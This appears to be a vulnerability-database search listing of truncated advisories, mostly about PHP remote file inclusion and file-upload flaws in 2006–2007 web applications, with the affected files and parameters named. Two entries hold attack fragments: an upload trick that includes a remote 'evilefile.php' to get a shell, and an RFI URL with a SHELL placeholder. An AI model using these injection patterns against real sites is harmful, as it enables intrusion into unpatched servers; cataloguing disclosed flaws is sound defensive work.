1978 matches found
CVE-2006-7003
PHP remote file inclusion vulnerability in admin/index.php in Fusion Polls allows remote attackers to execute arbitrary PHP code via a URL in the xtrphome parameter...
eXtreme File Hosting remote file upload vulnerability
A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell with phpshell. bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain ?php $file = 'http://sample.com/evilefile.php';...
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in gnopaste 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code via the GNPREALPATH parameter. NOTE: CVE and a third party dispute this issue, since GNPREALPATH is a constant, not a variable...
Remote file inclusion
PHP remote file inclusion vulnerability in examples/inc/top.inc.php in AgerMenu 0.03 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the rootdir parameter...
CVE-2007-0831
Multiple PHP remote file inclusion vulnerabilities in Atsphp 5.0.1 allow remote attackers to execute arbitrary PHP code via a URL in the CONFpath parameter to 1 index.php, 2 sources/usercp.php, or 3 sources/admin.php. NOTE: Another researcher has disputed this vulnerability, noting that CONFpath ...
CVE-2007-0808
PHP remote file inclusion vulnerability in Mina Ajans Script allows remote attackers to execute arbitrary PHP code via a URL in the syf parameter to an unspecified PHP script...
CVE-2007-0809
PHP remote file inclusion vulnerability in includes/classtemplate.php in Categories hierarchy aka CH or mod-CH 2.1.2 in ptirhiikmods allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
CVE-2007-0785
PHP remote file inclusion vulnerability in previewtheme.php in Flipsource Flip 2.01-final 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the incpath parameter...
Unrestricted file upload
Unrestricted file upload vulnerability in F3Site 2.1 and earlier allows remote authenticated administrators to upload and execute arbitrary PHP scripts via GIF86 header in a file in the uplf parameter, which can be later accessed via a relative pathname in the dir parameter in adm.php...
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in Miguel Nunes Call of Duty 2 CoD2 DreamStats System 4.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter...
CVE-2007-0764
CVE-2007-0764 concerns an unrestricted file upload in F3Site 2.1 and earlier . The vulnerability allows a remote authenticated administrator to upload and execute arbitrary PHP scripts by abusing a GIF86 header in a file passed via the uplf parameter , with the file later retrievable through a re...
CVE-2007-0704
PHP remote file inclusion vulnerability in install.php in Somery 0.4.6 allows remote attackers to execute arbitrary PHP code via a URL in the skindir parameter, a different vector than CVE-2006-4669. NOTE: the documentation says to remove install.php after installation...
CVE-2006-6966
CVE-2006-6966 affects phpGraphy before 0.9.13a. The flaw arises when input data includes a numeric parameter whose value matches a hash value of an alphanumeric parameter, allowing a remote attacker to execute arbitrary PHP code by uploading a config.php via the pictures[] parameter to index.php....
CVE-2007-0699
PHP remote file inclusion vulnerability in includes/includes.php in Guernion Sylvain Portail Web Php aka Gsylvain35 Portail Web, PwP before 2.5.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter...
PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability
Title : PhpMyRing = 4.1.3b path Remote File Include Vulnerability Author : ajann Contact : : S.Page : http://www.microniko.net/phpmyring/ $$ : Free ERROR .. ... ..... ? include $fichier.".php"; ? .. ... ..... ERROR RFI http://target/path//lang/leslangues.php?fichier=SHELL Example:...
Remote file inclusion
PHP remote file inclusion vulnerability in functions.php in EclipseBB 0.5.0 Lite allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...
Remote file inclusion
PHP remote file inclusion vulnerability in ainsmain.php in Johannes Gijsbers aka Taradino Ad Fundum Integratable News Script AINS 0.02b allows remote attackers to execute arbitrary PHP code via a URL in the ainspath parameter...
CVE-2007-0570
PHP remote file inclusion vulnerability in ainsmain.php in Johannes Gijsbers aka Taradino Ad Fundum Integratable News Script AINS 0.02b allows remote attackers to execute arbitrary PHP code via a URL in the ainspath parameter...
CVE-2006-6957
PHP remote file inclusion vulnerability in addons/modmedia/body.php in Docebo 3.0.3 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALSwhereframework parameter. NOTE: this issue might be resultant from a global overwrite...
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in FreeForum 0.9.0 allows remote attackers to execute arbitrary PHP code via a URL in the fpath parameter. NOTE: this issue has been disputed by third party researchers, stating that fpath variable is initialized before being used...